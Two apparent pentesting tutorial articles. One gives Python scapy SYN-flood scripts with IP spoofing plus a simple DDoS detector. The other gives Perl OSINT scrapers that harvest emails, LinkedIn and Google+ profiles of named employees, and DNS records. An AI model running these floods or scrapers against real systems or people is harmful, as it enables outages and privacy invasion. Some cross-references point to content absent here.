- Gray-box pentesting follows a hybrid approach of black-box and white-box testing:
  - The tester usually has limited information on the target network/system, provided by the client to lower costs and decrease trial and error on the part of the pentester
  - It performs the security assessment and testing internally

Introducing Python scripting

Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable types, data types (tuple, list, dictionary), functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstrations have been done with Python version 2.7.8. If you use a Linux OS such as Kali or BackTrack, there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most hackers choose this profession because they don't want to do programming; they want to use tools. However, without programming, a hacker cannot enhance their skills; every time, they have to search for tools on the Internet. Believe me, after seeing its simplicity, you will love this language.

Understanding the tests and tools you'll need

To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can create virtual machines on your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It is a good idea to use CentOS or Red Hat version 5 or 6 for the web server, because these include the RPMs for Apache and PHP. For the Python scripts, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms.

Learning the common testing platforms with Python

You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as in at least one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux; Windows, CentOS, and Kali Linux will be used.

A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools.
Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. Some tools work on both Linux and Windows, but on Windows, you have to install them yourself. I expect you to have knowledge of Linux. Now, it's time to work with networking in Python.

Implementing a network sniffer by using Python

Before learning about the implementation of a network sniffer, let's learn about two particular struct methods:

- struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format
- struct.unpack(fmt, string): This method unpacks the string according to the given format

Let's discuss the code:

import struct
ms = struct.pack('hhl', 1, 2, 3)
print (ms)
k = struct.unpack('hhl', ms)
print k

The output for the preceding code is as follows:

G:PythonNetworkingnetwork>python str1.py
☺ ☻ ♥
(1, 2, 3)

First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections.

Consider the situation of the client-server model; let's illustrate it by means of an example. Run the struct1.py file. The server-side code is as follows:

import socket
import struct

host = "192.168.0.1"
port = 12347
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
print "connected by", addr
msz = struct.pack('hhl', 1, 2, 3)
conn.send(msz)
conn.close()

The entire code is the same as we have seen previously, with msz = struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message.

Run the unstruc.py file. The client-side code is as follows:

import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port = 12347
s.connect((host, port))
msg = s.recv(1024)
print msg
print struct.unpack('hhl', msg)
s.close()

The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows:

C:network>python unstruc.py
☺ ☻ ♥
(1, 2, 3)

The output for the server-side code is as follows:

G:PythonNetworkingprogram>python struct1.py
connected by ('192.168.0.11', 1417)

Now, you must have a fair idea of how to pack and unpack data.

Format characters

We have seen the formats used in the pack and unpack methods. In the following table, the C Type and Python type columns denote the conversion between C and Python types, and the Standard size column refers to the size of the packed value in bytes:

Format | C Type             | Python type        | Standard size
x      | pad byte           | no value           |
c      | char               | string of length 1 | 1
b      | signed char        | integer            | 1
B      | unsigned char      | integer            | 1
?      | _Bool              | bool               | 1
h      | short              | integer            | 2
H      | unsigned short     | integer            | 2
i      | int                | integer            | 4
I      | unsigned int       | integer            | 4
l      | long               | integer            | 4
L      | unsigned long      | integer            | 4
q      | long long          | integer            | 8
Q      | unsigned long long | integer            | 8
f      | float              | float              | 4
d      | double             | float              | 8
s      | char[]             | string             |
p      | char[]             | string             |
P      | void *             | integer            |

Let's check what happens when one value is packed in different formats:

>>> import struct
>>> struct.pack('b', 2)
'\x02'
>>> struct.pack('B', 2)
'\x02'
>>> struct.pack('h', 2)
'\x02\x00'

We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes.
Now, let's use the long long int, which is 8 bytes:

>>> struct.pack('q', 2)
'\x02\x00\x00\x00\x00\x00\x00\x00'

If we work on a network, ! should be used in the format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little-endian, you can refer to the Wikipedia page on endianness:

>>> struct.pack('!q', 2)
'\x00\x00\x00\x00\x00\x00\x00\x02'
>>>

You can see the difference when using ! in the format.

Before proceeding to sniffing, you should be aware of the following definitions:

- PF_PACKET: This operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET.
- Raw socket: This does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application.

The following socket methods are used for byte-order conversion:

- socket.ntohl(x): Network to host long; this converts a 32-bit positive integer from network to host byte order
- socket.ntohs(x): Network to host short; this converts a 16-bit positive integer from network to host byte order
- socket.htonl(x): Host to network long; this converts a 32-bit positive integer from host to network byte order
- socket.htons(x): Host to network short; this converts a 16-bit positive integer from host to network byte order

So, what is the significance of the preceding four methods? Consider a 16-bit number, 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again.

Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP stack: the physical layer (Ethernet), the network layer (IP), and the TCP layer (ports).

Introducing DoS and DDoS

In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making them unavailable to the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out a DDoS attack, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports.

Single IP single port

In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and a single source port number. This is a very low-level DoS attack, and it will test the web server's request-handling capacity.
The following is the code of sisp.py:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")
srcport = int(raw_input("Enter the Source Port "))
i = 1
while True:
  IP1 = IP(src=src, dst=target)
  TCP1 = TCP(sport=srcport, dport=80)
  pkt = IP1 / TCP1
  send(pkt, inter=.001)
  print "packet sent ", i
  i = i + 1

I have used scapy to write this code, and I hope that you are familiar with it. The preceding code asks for three things: the source IP address, the target IP address, and the source port. I have used a spoofed source IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on the web server; irrespective of whether it works or not, write your findings in the reports. On the server side, a packet capture shows that our packets were successfully delivered. Repeat this program with different sequence numbers.

Single IP multiple port

Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")

i = 1
while True:
  for srcport in range(1, 65535):
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.0001)
    print "packet sent ", i
    i = i + 1

I used a for loop to iterate over the source ports. The attacker's output shows that the packets were sent successfully, and a capture on the target machine shows packets arriving across the whole range of port numbers. I will leave it to you to create the multiple IP with single port variant.

Multiple IP multiple port

In this section, we will discuss multiple IPs with multiple port addresses. In this attack, we use different IPs to send packets to the target; multiple IPs denote spoofed IPs. The following program, mimp.py, will send a huge number of packets from spoofed IPs:

import random
from scapy.all import *

target = raw_input("Enter the Target IP ")

i = 1
while True:
  a = str(random.randint(1, 254))
  b = str(random.randint(1, 254))
  c = str(random.randint(1, 254))
  d = str(random.randint(1, 254))
  dot = "."
  src = a + dot + b + dot + c + dot + d
  print src
  st = random.randint(1, 1000)
  en = random.randint(1000, 65535)
  loop_break = 0
  for srcport in range(st, en):
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.0001)
    print "packet sent ", i
    loop_break = loop_break + 1
    i = i + 1
    if loop_break == 50:
      break

In the preceding code, we used the a, b, c, and d variables to store four random strings, each ranging from 1 to 254, and the src variable stores the resulting random IP address. Here, we have used the loop_break variable to break the for loop after 50 packets, which means 50 packets originate from one IP; the rest of the code is the same as before. In the program's output, you can see that the IP address changes after every 50 packets. Use several machines and execute this code.
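The original article shows Wireshark captures of the flood arriving; if you want to watch it live on the target without a GUI, here is a minimal sketch (assuming the target's interface is eth0):

# Watch incoming SYNs to the web server, without name resolution
sudo tcpdump -n -i eth0 'tcp[tcpflags] & tcp-syn != 0 and dst port 80'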
On the target machine, you can see that it replies to the spoofed source IPs. This type of attack is very difficult to detect, because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host.

Detection of DDoS

When I was pursuing my Masters of Engineering degree, my friend and I were working on DDoS attacks. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source, so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running, only traffic containing port 80 should be allowed. Now, let's go through a very simple program to detect a DDoS attack. The program's name is DDOS_detect1.py:

import socket
import struct
from datetime import datetime

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt", 'a')
file_txt.writelines("**********")
t1 = str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
D_val = 10
D_val1 = D_val + 10
while True:
  pkt = s.recvfrom(2048)
  ipheader = pkt[0][14:34]
  ip_hdr = struct.unpack("!8sB3s4s4s", ipheader)
  IP = socket.inet_ntoa(ip_hdr[3])
  print "Source IP", IP
  if dict.has_key(IP):
    dict[IP] = dict[IP] + 1
    print dict[IP]
    if (dict[IP] > D_val) and (dict[IP] < D_val1):
      line = "DDOS Detected "
      file_txt.writelines(line)
      file_txt.writelines(IP)
      file_txt.writelines("\n")
  else:
    dict[IP] = 1

In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile for detected DDoS attacks. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val = 10 variable is an assumption made just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider the case of a tutorial website: the hits from college and school IPs would be higher. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of incoming packets from one IP exceeds the D_val variable, then the IP is considered responsible for a DDoS attack. The D_val1 variable is used later in the code to avoid redundancy.

I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement checks whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP] = dict[IP] + 1 statement increases the dict[IP] value by 1, which means that dict[IP] contains the count of packets that come from a particular IP. The if (dict[IP] > D_val) and (dict[IP] < D_val1): statement is the criterion for detecting and writing results to the dos.txt file: (dict[IP] > D_val) detects whether the incoming packet count exceeds the D_val value and, if it does, the subsequent statements write the IP to dos.txt as new packets arrive. To avoid redundant entries, the (dict[IP] < D_val1) condition has been used.

Run the program on a server and run mimp.py on the attacker's machine. In the resulting dos.txt file, a single offending IP is written 9 times, since we set D_val1 = D_val + 10.
You can change the D_val value to set the number of requests allowed from a particular IP. This depends on the old statistics of the website. I hope the preceding code will be useful for research purposes.

 Detecting a DDoS attack

If you are a security researcher, the preceding program should be useful to you. You can modify the code so that only the packets destined for port 80 are counted, as sketched earlier.

Summary

In this article, we learned about penetration testing using Python. We learned about sniffing using a Python script, client-side validation, and how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We went through how to use Python to fill a form and send the parameters where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of the Python DDoS-detection script, you can modify the code and create larger code, which can trigger actions to control or mitigate a DDoS attack on the server.

Resources for Article:

Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]

Open Source Intelligence

Packt
30 Dec 2014
30 min read
This article is written by Douglas Berdeaux, the author of Penetration Testing with Perl. Open source intelligence (OSINT) refers to intelligence gathering from open and public sources. These sources include search engines, the client target's web-accessible software or sites, social media sites and forums, Internet routing and naming authorities, public information sites, and more. If done properly and thoroughly, the practice of OSINT can prove useful in strengthening social engineering and remote exploitation attacks on our client target as we search for ways to gain access to their systems and buildings during a penetration test.

What's covered

In this article, we will cover how to gather the information listed here using Perl:

E-mail addresses from our client target using search engines and social media sites

Networking, hosting, routing, and system data of our client target using online resources and simple networking utilities

To gather this data, we rely heavily on the LWP::UserAgent Perl module. We will also discover how to use this module over a secured socket layer SSL/TLS (HTTPS) connection. In addition to this, we will learn about a few new Perl modules that are listed here:

Net::Whois::Raw
Net::DNS::Dig
Net::DNS
Net::Traceroute
XML::LibXML

Google dorks

Before we use Google for intelligence gathering, we should briefly touch upon using Google dorks, which we can use to refine and filter our Google searches. A Google dork is a string of special syntax that we pass to Google's request handler using the q= option. A dork can comprise operators and keywords separated by a colon, with strings concatenated using a plus symbol + as a delimiter. Here is a list of simple Google dorks that we can use to narrow our Google searches:

intitle:<string> searches for pages whose HTML title tags contain the string <string>

filetype:<ext> searches for files that have the extension <ext>

site:<domain> narrows the search to only results that are located on the <domain> target servers

inurl:<string> returns results that contain <string> in their URL

-<word> negates the word following the minus symbol - in a search filter

link:<page> searches for pages that contain HTML HREF links to the page

This is just a small list; a complete guide to Google search operators can be found on Google's support pages. A list of well-known exploited Google dorks for information gathering can be found in the Google Hacking Database at http://www.exploit-db.com/google-dorks/.

E-mail address gathering

Getting e-mail addresses from our target can be a rather hard task, and it can also mean gathering usernames used within the target's domain, remote management systems, databases, workstations, web applications, and much more. As we can imagine, gathering a username is 50 percent of the intrusion for target credential harvesting; the other 50 percent is the password. So how do we gather e-mail addresses from a target? Well, there are several methods; the first we will look at is simply using search engines to crawl the web for anything useful, including forum posts, social media, e-mail lists for support, web pages and mailto links, and anything else cached or found by ever-spidering search engines.

Using Google for e-mail address gathering

Automating queries to search engines is almost always best left to application programming interfaces (APIs).
We might be able to query the search engine via a simple GET request, but this leaves enough room for error, and the search engine can potentially block our IP address temporarily or force us to validate our humanness using an image of words (a CAPTCHA), as it might assume that we are using a bot. Unfortunately, Google only offers a paid version of their general search API. They do, however, offer an API for a custom search, but this is restricted to specified domains. We want to be as thorough as possible and search as much of the web as we can, time permitting, when intelligence gathering. Let's go back to our LWP::UserAgent Perl module and make a simple request to Google, searching for any e-mail addresses and URLs from a given domain. The URLs are useful as they can be spidered to within our application if we feel inclined to extend the reach of our automated OSINT. In the following examples, we want to impersonate a browser as much as possible so as not to raise flags at Google by using automation. We accomplish this by using the LWP::UserAgent Perl module and spoofing a valid Firefox user agent:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $usage = "Usage ./email_google.pl <domain>";
my $target = shift or die $usage;
my $ua = LWP::UserAgent->new;
my %emails = (); # unique
my $url = 'https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22'.$target.'%22';
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
$ua->show_progress(1); # display progress bar
my $res = $ua->get($url);
if($res->is_success){
 my @urls = split(/url\?q=/,$res->as_string);
 foreach my $gUrl (@urls){ # Google URLs
  next if($gUrl =~ m/(webcache.googleusercontent)/i or not $gUrl =~ m/^http/);
  $gUrl =~ s/&amp;sa=U.*//;
  print $gUrl,"\n";
 }
 my @emails = $res->as_string =~ m/[a-z0-9_.-]+@/ig;
 foreach my $email (@emails){
  if(not exists $emails{$email}){
   print "Possible Email Match: ",$email,$target,"\n";
   $emails{$email} = 1; # hashes are faster
  }
 }
} else{
 die $res->status_line;
}

The LWP::UserAgent module used in the previous code is not new to us. We did, however, add SSL support using the LWP::Protocol::https module. Our URL $url object is a simple Google search URL that anyone would browse to with a normal browser. The num= value controls the number of results returned by Google on a single page, which we have set to 100. To act like a browser, we set the user agent with the agent() method, which we did as a Mozilla browser. After this, we set a timeout and a Boolean to show a simple progress bar. The rest is just simple Perl string manipulation and pattern matching. We use the regular expression url\?q= to split the string returned by the as_string method from the $res object. Then, for each URL string, we use another regular expression, &amp;sa=U.*, to remove the excess analytic garbage that Google adds. Then, we simply parse out all e-mail addresses found using the same method but a different regexp. We stuff all matches into the @emails array and loop over them, displaying them on our screen if they don't already exist in the %emails Perl hash.
Let's run this program against the weaknetlabs.com domain and analyze the output:

root@wnld960:~# perl email_google.pl weaknetlabs.com
** GET https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22weaknetlabs.com%22 ==> 200 OK (1s)
http://weaknetlabs.com/
http://weaknetlabs.com/main/%3Fpage_id%3D479
…
http://www.securitytube.net/video/2039
Possible Email Match: Douglas@weaknetlabs.com
Possible Email Match: weaknetlabs@weaknetlabs.com
root@wnld960:~#

This is the (trimmed) output when we run an automated Google search for e-mail addresses from weaknetlabs.com.

Using social media for e-mail address gathering

Now, let's turn our attention to using social media sites such as Google+, LinkedIn, and Facebook to try to gather e-mail addresses using Perl. Social media sites can sometimes reflect information about an employee's attitude towards their employer, their status within the company, position, e-mail addresses, and more. All of this information is considered OSINT and can be useful when advancing our attacks.

Google+

We can also search plus.google.com for contact information from users belonging to our target. The following is the URL-encoded Google dork we will use to search the Google+ profiles for an employee of our target:

intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com

The URL-encoded symbols are as follows:

%3A: This is a colon, that is, :
%2B: This is a plus symbol, that is, +

The plus symbol + is a special component of a Google dork, as we mentioned in the previous section. The intitle keyword tells Google to display results whose HTML <title> tag contains the About – Google+ text. Then, we add the string (in quotations) "Works at " (notice the space at the end), and then the target name as the string object $target. The site keyword tells the Google search engine to only display results from the plus.google.com site. Let's implement this in our Perl program and see what results are returned for Google employees:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $ua = LWP::UserAgent->new;
my $usage = "Usage ./googleplus.pl <target name>";
my $target = shift or die $usage;
$target =~ s/\s/+/g;
my $gUrl = 'https://www.google.com/search?safe=off&noj=1&sclient=psy-ab&q=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com&oq=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com';
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
my $res = $ua->get($gUrl);
if($res->is_success){
 foreach my $string (split(/url\?q=/,$res->as_string)){
  next if($string =~ m/(webcache.googleusercontent)/i or not $string =~ m/^http/);
  $string =~ s/&amp;sa=U.*//;
  print $string,"\n";
 }
} else{
 die $res->status_line;
}

This Perl program is quite similar to our last search program. Now, let's run this to find possible Google employees. Since a target client company can have spaces in its name, we accommodate them by encoding them for Google as plus symbols (note the $target =~ s/\s/+/g; substitution):

root@wnld960:~# perl googleplus.pl google
https://plus.google.com/%2BPaulWilcox/about
https://plus.google.com/%2BNatalieVillalobos/about
...
https://plus.google.com/%2BAndrewGerrand/about
root@wnld960:~#

The preceding (trimmed) output proves that our Perl script works as we browse to the returned results. These two Google search scripts provided us with some great information quickly.
Let's move on to another example, not using Google but LinkedIn, a social media site for professionals.

LinkedIn

LinkedIn can provide us with the contact information and IT skill levels of our client target during a penetration test. Here, we will focus on the contact information. By now, we should feel very comfortable making any type of web request using LWP::UserAgent and parsing its output for intelligence data. In fact, this LinkedIn example should be a breeze. The trick is fine-tuning our filters and regular expressions to get only relevant data. Let's just dive right into the code and then analyze some sample output:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $ua = LWP::UserAgent->new;
my $usage = "Usage ./linkedIn.pl <target name>";
my $target = shift or die $usage;
my $gUrl = 'https://www.google.com/search?q=site:linkedin.com+%22at+'.$target.'%22';
my %lTargets = (); # unique
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
my $google = getUrl($gUrl); # one and ONLY call to Google
foreach my $title ($google =~ m/\shref="\/url\?.*?">[a-z0-9_. -]+\s?\bat $target\b\s-\sLinked/ig){
 my $lRurl = $title;
 $title =~ s/.*">([^<]+).*/$1/;
 $lRurl =~ s/.*url\?.*q=(.*)&amp;sa.*/$1/;
 print $title,"-> ".$lRurl."\n";
 my @ln = split(/\15?\12/,getUrl($lRurl));
 foreach(@ln){
  if(m/title="/i){
   my $link = $_;
   $link =~ s/.*href="([^"]+)".*/$1/;
   next if exists $lTargets{$link};
   $lTargets{$link} = 1;
   my $name = $_;
   $name =~ s/.*title="([^"]+)".*/$1/;
   print "\t",$name," : ",$link,"\n";
  }
 }
}
sub getUrl{
 sleep 1; # pause...
 my $res = $ua->get(shift);
 if($res->is_success){
  return $res->as_string;
 }else{
  die $res->status_line;
 }
}

The preceding Perl program makes one query to Google to find all possible positions from the target; for each position found, it queries LinkedIn to find employees of the target. The regular expressions used were finely crafted after inspection of the returned HTML object from a simple query to both Google and LinkedIn. This is a great example of how we can spider off from our initial Google results to gather even more intelligence using Perl automation. Let's take a look at some sample output from this program when used against Walmart.com:

root@wnld960:~# perl linkedIn.pl Walmart
Buyer : http://www.linkedin.com/title/buyer/at-walmart/
        Jason Kloster : http://www.linkedin.com/in/jasonkloster
        Rajiv Ahirwal : http://www.linkedin.com/in/rajivahirwal
...
Store manager : http://www.linkedin.com/title/store%2Bmanager/at-walmart/
        Benjamin Hunt 13k+ (LION) #1 Connected Leader at Walmart : http://www.linkedin.com/in/benjaminhunt01
...
Shift manager : http://www.linkedin.com/title/shift%2Bmanager/at-walmart/
        Frank Burns : http://www.linkedin.com/pub/frank-burns/24/83b/285
...
Assistant store manager : http://www.linkedin.com/title/assistant%2Bstore%2Bmanager/at-walmart/
        John Cole : http://www.linkedin.com/pub/john-cole/67/392/b39
        Crystal Herrera : http://www.linkedin.com/pub/crystal-herrera/92/74a/97b
root@wnld960:~#

The preceding (trimmed) output provided some great insight into employee positions, and even real employees in those positions at the target, with a simple call to one script.
All of this information is publicly available, and we are not directly attacking Walmart or its employees; we are just using this as an example of intelligence-gathering techniques during a penetration test using Perl programming. This information can further be used for reporting, and we can even extend this data into other areas of research. For instance, we can easily follow the LinkedIn links with LWP::UserAgent and pull even more data from the publicly available LinkedIn profiles. This data, when compared with Google+ profile data and simple Google searches, should help in providing the background needed to create a more believable pretext for social engineering. Now, let's see if we can use Google to search more social media websites for information on our client target.

Facebook

We can easily argue that Facebook is one of the largest social networking sites around at the time of writing this book. Facebook can easily return a large amount of data about a person, and we don't even have to go to the site to get it! We can easily extend our reach into the Web with the gathered employee names from our previous code by searching Google using the site:facebook.com parameter and the exact same syntax as in the first example in the Google section of the E-mail address gathering section. The following are a few simple Google dorks that can possibly reveal information about our client target:

site:facebook.com "manager at target"
site:facebook.com "ceo at target"
site:facebook.com "owner of target"
site:facebook.com "experience at target"

This information can return customer and employee criticism that can be used for a wide array of penetration-testing purposes, including social engineering pretexting. We can narrow our focus even further by adding other keywords and strings from our previously gathered intelligence, such as city names, company names, and more. Just about anything returned can be compiled into a unique wordlist for password cracking, and contrasted with known data using Digital Credential Analysis (DCA).

Domain Name Services

Domain Name Services (DNS) are used to translate hostnames into IP addresses, so that we can use alphanumeric addresses instead of numeric IP addresses for websites or services. It makes our lives a lot easier when typing in a URL with a name rather than a 4-byte numerical value. Any client target can potentially have full control over their naming services. DNS A records can be assigned to any IP address. If we control a domain, we can easily write our own record for an IPv4 class A address, such as 10.0.0.1, which is commonly done on an internal network to allow its users to easily connect to different internal services.

The Whois query

Sometimes, when we can get an IP address for a client target, we can pass this IP address to the Whois database, and in return, we can get the range of IP addresses in which our IP lies and the organization that owns the range. If the organization is our target, then we now know a range of IP addresses pointing directly to their resources. Usually, this information is given during a penetration test, and limits are set on how far we are allowed to probe the IP ranges, so we may be restricted simply to reporting.
Let's use Perl and the Net::Whois::Raw module to interact with the American Registry for Internet Numbers (ARIN) database for an IP address:

#!/usr/bin/perl -w
use strict;
use Net::Whois::Raw;
die "Usage: perl netRange.pl <IP Address>" unless $ARGV[0];
foreach(split(/\n/,whois(shift))){
 print $_,"\n" if(m/^(netrange|orgname)/i);
}

The preceding code, when run, should produce information about the network range and the organization name that owns the range. It is very simple, and it can be compared to calling the whois program from the Linux command line. If we were to script this to run through a number of different IP addresses and run the Whois query against each one, we could be violating the terms of service set by ARIN. Let's test it and see what we get with a random IP address:

root@wnld960:~# perl netRange.pl 198.123.2.22
NetRange:       198.116.0.0 - 198.123.255.255
OrgName:       National Aeronautics and Space Administration
root@wnld960:~#

This is the output from our Perl program, which reveals an IP range that can belong to the organization listed. If this fails, and we need to find more than one hostname owned by our client target, we can try a brute force method that simply checks our name servers; we will do just that in the next section.

The DIG query

DIG stands for domain information groper and is a utility to do just that using DNS queries. The DIG Linux utility has actually replaced the older host and nslookup utilities. In making these queries, one thing to note is that when we don't specify a name server to use, the DIG utility will simply use the Linux OS default resolver. We can, however, pass a name server to DIG; we will cover this in the upcoming section, Zone transfers. There is a nice object-oriented Perl module for DIG that we will examine, called Net::DNS::Dig. Let's quickly look at an example to query our DNS with this module:

#!/usr/bin/perl -w
use Net::DNS::Dig;
use strict;
my $dig = new Net::DNS::Dig();
my $dom = shift or die "Usage: perl dig.pl <domain>";
my $dobj = $dig->for($dom, 'A');
print $dobj->sprintf; # print entire dig query response
print "CODE: ",$dobj->rcode(1),"\n"; # Dig Response Code
my %mx = Net::DNS::Dig->new()->for($dom,'MX')->rdata();
while(my($val,$server) = each(%mx)){
 print "MX: ",$server," - ",$val,"\n";
}

The preceding code is simple. We create a DIG object $dig and call the for() method, passing the domain name we pulled by shifting the command-line arguments and the type A for A records. We print the returned response with sprintf(), and then the response code alone with the rcode() method. Finally, we create a hash object %mx from the rdata() method. We pass the rdata() object returned from making a new Net::DNS::Dig object, and call the for() method on it with a type of MX for the mail server. Let's try this against a domain and see what is returned:

root@wnld960:~# perl dig.pl weaknetlabs.com
; <<>> Net::DNS::Dig 0.12 <<>> -t a weaknetlabs.com.
;;
;; Got answer.
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34071
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;weaknetlabs.com.               IN     A
;; ANSWER SECTION:
weaknetlabs.com.       300    IN     A       198.144.36.192
;; Query time: 118 ms
;; SERVER: 75.75.76.76# 53(75.75.76.76)
;; WHEN: Mon May 19 18:26:31 2014
;; MSG SIZE rcvd: 49 -- XFR size: 2 records
CODE: NOERROR
MX: mailstore1.secureserver.net - 10
MX: smtp.secureserver.net - 0

The output is just as expected.
Everything above the line starting with CODE is the response from making the DIG query. CODE is returned from the rcode() method. Since we passed a true value to rcode(), we got a string type, NOERROR, returned. Next, we printed the key and value pairs of the %mx Perl hash, which displayed our target's e-mail server names.

Brute force enumeration

Keeping the previous lesson in mind, and knowing that Linux offers a great wealth of networking utilities, we might be inclined to write our own DNS brute force tool to enumerate any possible A records that our client target could have created prior to our penetration test. Let's take a quick look at the nslookup utility we can use to check whether a record exists:

trevelyn@wnld960:~$ nslookup admin.warcarrier.org
Server:         75.75.76.76
Address:       75.75.76.76#53
Non-authoritative answer:
Name:   admin.warcarrier.org
Address: 10.0.0.1
trevelyn@wnld960:~$ nslookup admindoesntexist.warcarrier.org
Server:         75.75.76.76
Address:        75.75.76.76#53
** server can't find admindoesntexist.warcarrier.org: NXDOMAIN
trevelyn@wnld960:~$

This is the output of two calls to nslookup, the networking utility used for returning the IP addresses of hostnames, and vice versa. The first A record check was successful, and the second, the admindoesntexist subdomain, was not. We can easily see from the output of this program how we can parse it to check whether a subdomain exists. We can also see from the two subdomains that, for efficiency, we can use a simple word list of commonly used subdomains before trying many possible combinations.

A lot of intelligence gathering might have already been done for you by search engines such as Google. In fact, the keyword search site: can return more than just the www subdomains. If we broaden our num= URL GET parameter and loop through all possible results by incrementing the start= parameter, we can potentially get results from other subdomains of our target.

Now that we have seen the basic query for a subdomain, let's turn our focus to using Perl and a new Perl module, Net::DNS, to enumerate a few subdomains:

#!/usr/bin/perl -w
use strict;
use Net::DNS;
my $dns = Net::DNS::Resolver->new;
my @subDomains = ("admin","admindoesntexist","www","mail","download","gateway");
my $usage = "perl domainbf.pl <domain name>";
my $domain = shift or die $usage;
my $total = 0;
dns($_) foreach(@subDomains);
print $total," records tested\n";
sub dns{ # search sub domains:
 $total++; # record count
 my $hn = shift.".".$domain; # construct hostname
 my $dnsLookup = $dns->search($hn);
 if($dnsLookup){ # successful lookup
  my $t=0;
  foreach my $ip ($dnsLookup->answer){
   return unless $ip->type eq "A" and $t<1; # A records
   print $hn,": ",$ip->address,"\n"; # just the IP
   $t++;
  }
 }
 return;
}

